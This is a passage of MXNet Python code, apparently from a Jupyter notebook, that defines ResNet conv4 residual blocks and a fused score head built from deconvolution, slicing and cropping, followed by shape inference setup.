res4b3_branch2b_relu = mx.symbol.Activation(name='res4b3_branch2b_relu', data=bn4b3_branch2b , act_type='relu')
res4b3_branch2c = mx.symbol.Convolution(name='res4b3_branch2c', data=res4b3_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b3_branch2c = mx.symbol.BatchNorm(name='bn4b3_branch2c', data=res4b3_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b3 = mx.symbol.broadcast_add(name='res4b3', *[res4b2_relu,bn4b3_branch2c] )
res4b3_relu = mx.symbol.Activation(name='res4b3_relu', data=res4b3 , act_type='relu')
res4b4_branch2a = mx.symbol.Convolution(name='res4b4_branch2a', data=res4b3_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b4_branch2a = mx.symbol.BatchNorm(name='bn4b4_branch2a', data=res4b4_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b4_branch2a_relu = mx.symbol.Activation(name='res4b4_branch2a_relu', data=bn4b4_branch2a , act_type='relu')
res4b4_branch2b = mx.symbol.Convolution(name='res4b4_branch2b', data=res4b4_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b4_branch2b = mx.symbol.BatchNorm(name='bn4b4_branch2b', data=res4b4_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b4_branch2b_relu = mx.symbol.Activation(name='res4b4_branch2b_relu', data=bn4b4_branch2b , act_type='relu')
res4b4_branch2c = mx.symbol.Convolution(name='res4b4_branch2c', data=res4b4_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b4_branch2c = mx.symbol.BatchNorm(name='bn4b4_branch2c', data=res4b4_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b4 = mx.symbol.broadcast_add(name='res4b4', *[res4b3_relu,bn4b4_branch2c] )
res4b4_relu = mx.symbol.Activation(name='res4b4_relu', data=res4b4 , act_type='relu')
res4b5_branch2a = mx.symbol.Convolution(name='res4b5_branch2a', data=res4b4_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b5_branch2a = mx.symbol.BatchNorm(name='bn4b5_branch2a', data=res4b5_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b5_branch2a_relu = mx.symbol.Activation(name='res4b5_branch2a_relu', data=bn4b5_branch2a , act_type='relu')
res4b5_branch2b = mx.symbol.Convolution(name='res4b5_branch2b', data=res4b5_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b5_branch2b = mx.symbol.BatchNorm(name='bn4b5_branch2b', data=res4b5_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b5_branch2b_relu = mx.symbol.Activation(name='res4b5_branch2b_relu', data=bn4b5_branch2b , act_type='relu')
res4b5_branch2c = mx.symbol.Convolution(name='res4b5_branch2c', data=res4b5_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b5_branch2c = mx.symbol.BatchNorm(name='bn4b5_branch2c', data=res4b5_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b5 = mx.symbol.broadcast_add(name='res4b5', *[res4b4_relu,bn4b5_branch2c] )
res4b5_relu = mx.symbol.Activation(name='res4b5_relu', data=res4b5 , act_type='relu')
res4b6_branch2a = mx.symbol.Convolution(name='res4b6_branch2a', data=res4b5_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b6_branch2a = mx.symbol.BatchNorm(name='bn4b6_branch2a', data=res4b6_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b6_branch2a_relu = mx.symbol.Activation(name='res4b6_branch2a_relu', data=bn4b6_branch2a , act_type='relu')
res4b6_branch2b = mx.symbol.Convolution(name='res4b6_branch2b', data=res4b6_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b6_branch2b = mx.symbol.BatchNorm(name='bn4b6_branch2b', data=res4b6_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b6_branch2b_relu = mx.symbol.Activation(name='res4b6_branch2b_relu', data=bn4b6_branch2b , act_type='relu')
res4b6_branch2c = mx.symbol.Convolution(name='res4b6_branch2c', data=res4b6_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b6_branch2c = mx.symbol.BatchNorm(name='bn4b6_branch2c', data=res4b6_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b6 = mx.symbol.broadcast_add(name='res4b6', *[res4b5_relu,bn4b6_branch2c] )
res4b6_relu = mx.symbol.Activation(name='res4b6_relu', data=res4b6 , act_type='relu')
res4b7_branch2a = mx.symbol.Convolution(name='res4b7_branch2a', data=res4b6_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b7_branch2a = mx.symbol.BatchNorm(name='bn4b7_branch2a', data=res4b7_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b7_branch2a_relu = mx.symbol.Activation(name='res4b7_branch2a_relu', data=bn4b7_branch2a , act_type='relu')
res4b7_branch2b = mx.symbol.Convolution(name='res4b7_branch2b', data=res4b7_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b7_branch2b = mx.symbol.BatchNorm(name='bn4b7_branch2b', data=res4b7_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b7_branch2b_relu = mx.symbol.Activation(name='res4b7_branch2b_relu', data=bn4b7_branch2b , act_type='relu')
res4b7_branch2c = mx.symbol.Convolution(name='res4b7_branch2c', data=res4b7_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b7_branch2c = mx.symbol.BatchNorm(name='bn4b7_branch2c', data=res4b7_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b7 = mx.symbol.broadcast_add(name='res4b7', *[res4b6_relu,bn4b7_branch2c] )
res4b7_relu = mx.symbol.Activation(name='res4b7_relu', data=res4b7 , act_type='relu')
res4b8_branch2a = mx.symbol.Convolution(name='res4b8_branch2a', data=res4b7_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b8_branch2a = mx.symbol.BatchNorm(name='bn4b8_branch2a', data=res4b8_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b8_branch2a_relu = mx.symbol.Activation(name='res4b8_branch2a_relu', data=bn4b8_branch2a , act_type='relu')
res4b8_branch2b = mx.symbol.Convolution(name='res4b8_branch2b', data=res4b8_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b8_branch2b = mx.symbol.BatchNorm(name='bn4b8_branch2b', data=res4b8_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b8_branch2b_relu = mx.symbol.Activation(name='res4b8_branch2b_relu', data=bn4b8_branch2b , act_type='relu')
res4b8_branch2c = mx.symbol.Convolution(name='res4b8_branch2c', data=res4b8_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b8_branch2c = mx.symbol.BatchNorm(name='bn4b8_branch2c', data=res4b8_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b8 = mx.symbol.broadcast_add(name='res4b8', *[res4b7_relu,bn4b8_branch2c] )
res4b8_relu = mx.symbol.Activation(name='res4b8_relu', data=res4b8 , act_type='relu')
res4b9_branch2a = mx.symbol.Convolution(name='res4b9_branch2a', data=res4b8_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b9_branch2a = mx.symbol.BatchNorm(name='bn4b9_branch2a', data=res4b9_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b9_branch2a_relu = mx.symbol.Activation(name='res4b9_branch2a_relu', data=bn4b9_branch2a , act_type='relu')
res4b9_branch2b = mx.symbol.Convolution(name='res4b9_branch2b', data=res4b9_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b9_branch2b = mx.symbol.BatchNorm(name='bn4b9_branch2b', data=res4b9_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b9_branch2b_relu = mx.symbol.Activation(name='res4b9_branch2b_relu', data=bn4b9_branch2b , act_type='relu')
res4b9_branch2c = mx.symbol.Convolution(name='res4b9_branch2c', data=res4b9_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b9_branch2c = mx.symbol.BatchNorm(name='bn4b9_branch2c', data=res4b9_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b9 = mx.symbol.broadcast_add(name='res4b9', *[res4b8_relu,bn4b9_branch2c] )
res4b9_relu = mx.symbol.Activation(name='res4b9_relu', data=res4b9 , act_type='relu')
res4b10_branch2a = mx.symbol.Convolution(name='res4b10_branch2a', data=res4b9_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b10_branch2a = mx.symbol.BatchNorm(name='bn4b10_branch2a', data=res4b10_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b10_branch2a_relu = mx.symbol.Activation(name='res4b10_branch2a_relu', data=bn4b10_branch2a , act_type='relu')
res4b10_branch2b = mx.symbol.Convolution(name='res4b10_branch2b', data=res4b10_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b10_branch2b = mx.symbol.BatchNorm(name='bn4b10_branch2b', data=res4b10_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b10_branch2b_relu = mx.symbol.Activation(name='res4b10_branch2b_relu', data=bn4b10_branch2b , act_type='relu')
res4b10_branch2c = mx.symbol.Convolution(name='res4b10_branch2c', data=res4b10_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b10_branch2c = mx.symbol.BatchNorm(name='bn4b10_branch2c', data=res4b10_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b10 = mx.symbol.broadcast_add(name='res4b10', *[res4b9_relu,bn4b10_branch2c] )
res4b10_relu = mx.symbol.Activation(name='res4b10_relu', data=res4b10 , act_type='relu')
res4b11_branch2a = mx.symbol.Convolution(name='res4b11_branch2a', data=res4b10_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b11_branch2a = mx.symbol.BatchNorm(name='bn4b11_branch2a', data=res4b11_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b11_branch2a_relu = mx.symbol.Activation(name='res4b11_branch2a_relu', data=bn4b11_branch2a , act_type='relu')
res4b11_branch2b = mx.symbol.Convolution(name='res4b11_branch2b', data=res4b11_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b11_branch2b = mx.symbol.BatchNorm(name='bn4b11_branch2b', data=res4b11_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b11_branch2b_relu = mx.symbol.Activation(name='res4b11_branch2b_relu', data=bn4b11_branch2b , act_type='relu')
res4b11_branch2c = mx.symbol.Convolution(name='res4b11_branch2c', data=res4b11_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b11_branch2c = mx.symbol.BatchNorm(name='bn4b11_branch2c', data=res4b11_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b11 = mx.symbol.broadcast_add(name='res4b11', *[res4b10_relu,bn4b11_branch2c] )
res4b11_relu = mx.symbol.Activation(name='res4b11_relu', data=res4b11 , act_type='relu')
res4b12_branch2a = mx.symbol.Convolution(name='res4b12_branch2a', data=res4b11_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b12_branch2a = mx.symbol.BatchNorm(name='bn4b12_branch2a', data=res4b12_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b12_branch2a_relu = mx.symbol.Activation(name='res4b12_branch2a_relu', data=bn4b12_branch2a , act_type='relu')
res4b12_branch2b = mx.symbol.Convolution(name='res4b12_branch2b', data=res4b12_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b12_branch2b = mx.symbol.BatchNorm(name='bn4b12_branch2b', data=res4b12_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b12_branch2b_relu = mx.symbol.Activation(name='res4b12_branch2b_relu', data=bn4b12_branch2b , act_type='relu')
res4b12_branch2c = mx.symbol.Convolution(name='res4b12_branch2c', data=res4b12_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b12_branch2c = mx.symbol.BatchNorm(name='bn4b12_branch2c', data=res4b12_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b12 = mx.symbol.broadcast_add(name='res4b12', *[res4b11_relu,bn4b12_branch2c] )
res4b12_relu = mx.symbol.Activation(name='res4b12_relu', data=res4b12 , act_type='relu')
res4b13_branch2a = mx.symbol.Convolution(name='res4b13_branch2a', data=res4b12_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b13_branch2a = mx.symbol.BatchNorm(name='bn4b13_branch2a', data=res4b13_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b13_branch2a_relu = mx.symbol.Activation(name='res4b13_branch2a_relu', data=bn4b13_branch2a , act_type='relu')
res4b13_branch2b = mx.symbol.Convolution(name='res4b13_branch2b', data=res4b13_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b13_branch2b = mx.symbol.BatchNorm(name='bn4b13_branch2b', data=res4b13_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b13_branch2b_relu = mx.symbol.Activation(name='res4b13_branch2b_relu', data=bn4b13_branch2b , act_type='relu')
res4b13_branch2c = mx.symbol.Convolution(name='res4b13_branch2c', data=res4b13_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b13_branch2c = mx.symbol.BatchNorm(name='bn4b13_branch2c', data=res4b13_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b13 = mx.symbol.broadcast_add(name='res4b13', *[res4b12_relu,bn4b13_branch2c] )
res4b13_relu = mx.symbol.Activation(name='res4b13_relu', data=res4b13 , act_type='relu')
res4b14_branch2a = mx.symbol.Convolution(name='res4b14_branch2a', data=res4b13_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b14_branch2a = mx.symbol.BatchNorm(name='bn4b14_branch2a', data=res4b14_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b14_branch2a_relu = mx.symbol.Activation(name='res4b14_branch2a_relu', data=bn4b14_branch2a , act_type='relu')
res4b14_branch2b = mx.symbol.Convolution(name='res4b14_branch2b', data=res4b14_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b14_branch2b = mx.symbol.BatchNorm(name='bn4b14_branch2b', data=res4b14_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b14_branch2b_relu = mx.symbol.Activation(name='res4b14_branch2b_relu', data=bn4b14_branch2b , act_type='relu')
res4b14_branch2c = mx.symbol.Convolution(name='res4b14_branch2c', data=res4b14_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b14_branch2c = mx.symbol.BatchNorm(name='bn4b14_branch2c', data=res4b14_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b14 = mx.symbol.broadcast_add(name='res4b14', *[res4b13_relu,bn4b14_branch2c] )
res4b14_relu = mx.symbol.Activation(name='res4b14_relu', data=res4b14 , act_type='relu')
res4b15_branch2a = mx.symbol.Convolution(name='res4b15_branch2a', data=res4b14_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b15_branch2a = mx.symbol.BatchNorm(name='bn4b15_branch2a', data=res4b15_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b15_branch2a_relu = mx.symbol.Activation(name='res4b15_branch2a_relu', data=bn4b15_branch2a , act_type='relu')
res4b15_branch2b = mx.symbol.Convolution(name='res4b15_branch2b', data=res4b15_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b15_branch2b = mx.symbol.BatchNorm(name='bn4b15_branch2b', data=res4b15_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b15_branch2b_relu = mx.symbol.Activation(name='res4b15_branch2b_relu', data=bn4b15_branch2b , act_type='relu')
res4b15_branch2c = mx.symbol.Convolution(name='res4b15_branch2c', data=res4b15_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b15_branch2c = mx.symbol.BatchNorm(name='bn4b15_branch2c', data=res4b15_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b15 = mx.symbol.broadcast_add(name='res4b15', *[res4b14_relu,bn4b15_branch2c] )
res4b15_relu = mx.symbol.Activation(name='res4b15_relu', data=res4b15 , act_type='relu')
res4b16_branch2a = mx.symbol.Convolution(name='res4b16_branch2a', data=res4b15_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b16_branch2a = mx.symbol.BatchNorm(name='bn4b16_branch2a', data=res4b16_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b16_branch2a_relu = mx.symbol.Activation(name='res4b16_branch2a_relu', data=bn4b16_branch2a , act_type='relu')
res4b16_branch2b = mx.symbol.Convolution(name='res4b16_branch2b', data=res4b16_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b16_branch2b = mx.symbol.BatchNorm(name='bn4b16_branch2b', data=res4b16_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b16_branch2b_relu = mx.symbol.Activation(name='res4b16_branch2b_relu', data=bn4b16_branch2b , act_type='relu')
res4b16_branch2c = mx.symbol.Convolution(name='res4b16_branch2c', data=res4b16_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b16_branch2c = mx.symbol.BatchNorm(name='bn4b16_branch2c', data=res4b16_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b16 = mx.symbol.broadcast_add(name='res4b16', *[res4b15_relu,bn4b16_branch2c] )
res4b16_relu = mx.symbol.Activation(name='res4b16_relu', data=res4b16 , act_type='relu')
res4b17_branch2a = mx.symbol.Convolution(name='res4b17_branch2a', data=res4b16_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b17_branch2a = mx.symbol.BatchNorm(name='bn4b17_branch2a', data=res4b17_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b17_branch2a_relu = mx.symbol.Activation(name='res4b17_branch2a_relu', data=bn4b17_branch2a , act_type='relu')
res4b17_branch2b = mx.symbol.Convolution(name='res4b17_branch2b', data=res4b17_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b17_branch2b = mx.symbol.BatchNorm(name='bn4b17_branch2b', data=res4b17_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b17_branch2b_relu = mx.symbol.Activation(name='res4b17_branch2b_relu', data=bn4b17_branch2b , act_type='relu')
res4b17_branch2c = mx.symbol.Convolution(name='res4b17_branch2c', data=res4b17_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b17_branch2c = mx.symbol.BatchNorm(name='bn4b17_branch2c', data=res4b17_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b17 = mx.symbol.broadcast_add(name='res4b17', *[res4b16_relu,bn4b17_branch2c] )
res4b17_relu = mx.symbol.Activation(name='res4b17_relu', data=res4b17 , act_type='relu')
res4b18_branch2a = mx.symbol.Convolution(name='res4b18_branch2a', data=res4b17_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b18_branch2a = mx.symbol.BatchNorm(name='bn4b18_branch2a', data=res4b18_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b18_branch2a_relu = mx.symbol.Activation(name='res4b18_branch2a_relu', data=bn4b18_branch2a , act_type='relu')
res4b18_branch2b = mx.symbol.Convolution(name='res4b18_branch2b', data=res4b18_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b18_branch2b = mx.symbol.BatchNorm(name='bn4b18_branch2b', data=res4b18_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b18_branch2b_relu = mx.symbol.Activation(name='res4b18_branch2b_relu', data=bn4b18_branch2b , act_type='relu')
res4b18_branch2c = mx.symbol.Convolution(name='res4b18_branch2c', data=res4b18_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b18_branch2c = mx.symbol.BatchNorm(name='bn4b18_branch2c', data=res4b18_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b18 = mx.symbol.broadcast_add(name='res4b18', *[res4b17_relu,bn4b18_branch2c] )
res4b18_relu = mx.symbol.Activation(name='res4b18_relu', data=res4b18 , act_type='relu')
res4b19_branch2a = mx.symbol.Convolution(name='res4b19_branch2a', data=res4b18_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b19_branch2a = mx.symbol.BatchNorm(name='bn4b19_branch2a', data=res4b19_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b19_branch2a_relu = mx.symbol.Activation(name='res4b19_branch2a_relu', data=bn4b19_branch2a , act_type='relu')
res4b19_branch2b = mx.symbol.Convolution(name='res4b19_branch2b', data=res4b19_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b19_branch2b = mx.symbol.BatchNorm(name='bn4b19_branch2b', data=res4b19_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b19_branch2b_relu = mx.symbol.Activation(name='res4b19_branch2b_relu', data=bn4b19_branch2b , act_type='relu')
res4b19_branch2c = mx.symbol.Convolution(name='res4b19_branch2c', data=res4b19_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b19_branch2c = mx.symbol.BatchNorm(name='bn4b19_branch2c', data=res4b19_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b19 = mx.symbol.broadcast_add(name='res4b19', *[res4b18_relu,bn4b19_branch2c] )
res4b19_relu = mx.symbol.Activation(name='res4b19_relu', data=res4b19 , act_type='relu')
res4b20_branch2a = mx.symbol.Convolution(name='res4b20_branch2a', data=res4b19_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b20_branch2a = mx.symbol.BatchNorm(name='bn4b20_branch2a', data=res4b20_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b20_branch2a_relu = mx.symbol.Activation(name='res4b20_branch2a_relu', data=bn4b20_branch2a , act_type='relu')
res4b20_branch2b = mx.symbol.Convolution(name='res4b20_branch2b', data=res4b20_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b20_branch2b = mx.symbol.BatchNorm(name='bn4b20_branch2b', data=res4b20_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b20_branch2b_relu = mx.symbol.Activation(name='res4b20_branch2b_relu', data=bn4b20_branch2b , act_type='relu')
res4b20_branch2c = mx.symbol.Convolution(name='res4b20_branch2c', data=res4b20_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b20_branch2c = mx.symbol.BatchNorm(name='bn4b20_branch2c', data=res4b20_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b20 = mx.symbol.broadcast_add(name='res4b20', *[res4b19_relu,bn4b20_branch2c] )
res4b20_relu = mx.symbol.Activation(name='res4b20_relu', data=res4b20 , act_type='relu')
res4b21_branch2a = mx.symbol.Convolution(name='res4b21_branch2a', data=res4b20_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b21_branch2a = mx.symbol.BatchNorm(name='bn4b21_branch2a', data=res4b21_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b21_branch2a_relu = mx.symbol.Activation(name='res4b21_branch2a_relu', data=bn4b21_branch2a , act_type='relu')
res4b21_branch2b = mx.symbol.Convolution(name='res4b21_branch2b', data=res4b21_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b21_branch2b = mx.symbol.BatchNorm(name='bn4b21_branch2b', data=res4b21_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b21_branch2b_relu = mx.symbol.Activation(name='res4b21_branch2b_relu', data=bn4b21_branch2b , act_type='relu')
res4b21_branch2c = mx.symbol.Convolution(name='res4b21_branch2c', data=res4b21_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b21_branch2c = mx.symbol.BatchNorm(name='bn4b21_branch2c', data=res4b21_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b21 = mx.symbol.broadcast_add(name='res4b21', *[res4b20_relu,bn4b21_branch2c] )
res4b21_relu = mx.symbol.Activation(name='res4b21_relu', data=res4b21 , act_type='relu')
res4b22_branch2a = mx.symbol.Convolution(name='res4b22_branch2a', data=res4b21_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b22_branch2a = mx.symbol.BatchNorm(name='bn4b22_branch2a', data=res4b22_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b22_branch2a_relu = mx.symbol.Activation(name='res4b22_branch2a_relu', data=bn4b22_branch2a , act_type='relu')
res4b22_branch2b = mx.symbol.Convolution(name='res4b22_branch2b', data=res4b22_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b22_branch2b = mx.symbol.BatchNorm(name='bn4b22_branch2b', data=res4b22_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b22_branch2b_relu = mx.symbol.Activation(name='res4b22_branch2b_relu', data=bn4b22_branch2b , act_type='relu')
res4b22_branch2c = mx.symbol.Convolution(name='res4b22_branch2c', data=res4b22_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b22_branch2c = mx.symbol.BatchNorm(name='bn4b22_branch2c', data=res4b22_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b22 = mx.symbol.broadcast_add(name='res4b22', *[res4b21_relu,bn4b22_branch2c] )
res4b22_relu = mx.symbol.Activation(name='res4b22_relu', data=res4b22 , act_type='relu')
score_res4 = mx.symbol.Convolution(name='score_res4', data=res4b22_relu , num_filter=125, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=False)
score4 = mx.symbol.Deconvolution(name='score4', data=score_res4 , num_filter=125, pad=(0, 0), kernel=(4,4), stride=(2,2), no_bias=True)
score_res3 = mx.symbol.Convolution(name='score_res3', data=res3b3_relu , num_filter=125, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=False)
# As the convolution block make input padding and output downsampling, the deconvolution block should make input upsampling and OUTPUT CROPPING.
# It's tricky to crop the deconvolution result with 'slice' op, same to the crop param [1,2,1,2] of ConvTranspose in matconvnet.
score4_sliced = mx.symbol.slice(name='score4_sliced', data=score4, begin=(0,0,1,1), end=(None,None,-2,-2))
crop = mx.symbol.Crop(name='crop', *[score_res3, score4_sliced] , center_crop=True)
fusex = mx.symbol.broadcast_add(name='fusex', *[score4_sliced,crop] )
# In[67]:
arg_shapes, _, aux_shapes = fusex.infer_shape(data=(1,3,224,224))
arg_names = fusex.list_arguments()
aux_names = fusex.list_auxiliary_states()
arg_shape_dic = dict(zip(arg_names, arg_shapes))
aux_shape_dic = dict(zip(aux_names, aux_shapes))
arg_params = {}
aux_params = {}
# In[70]:
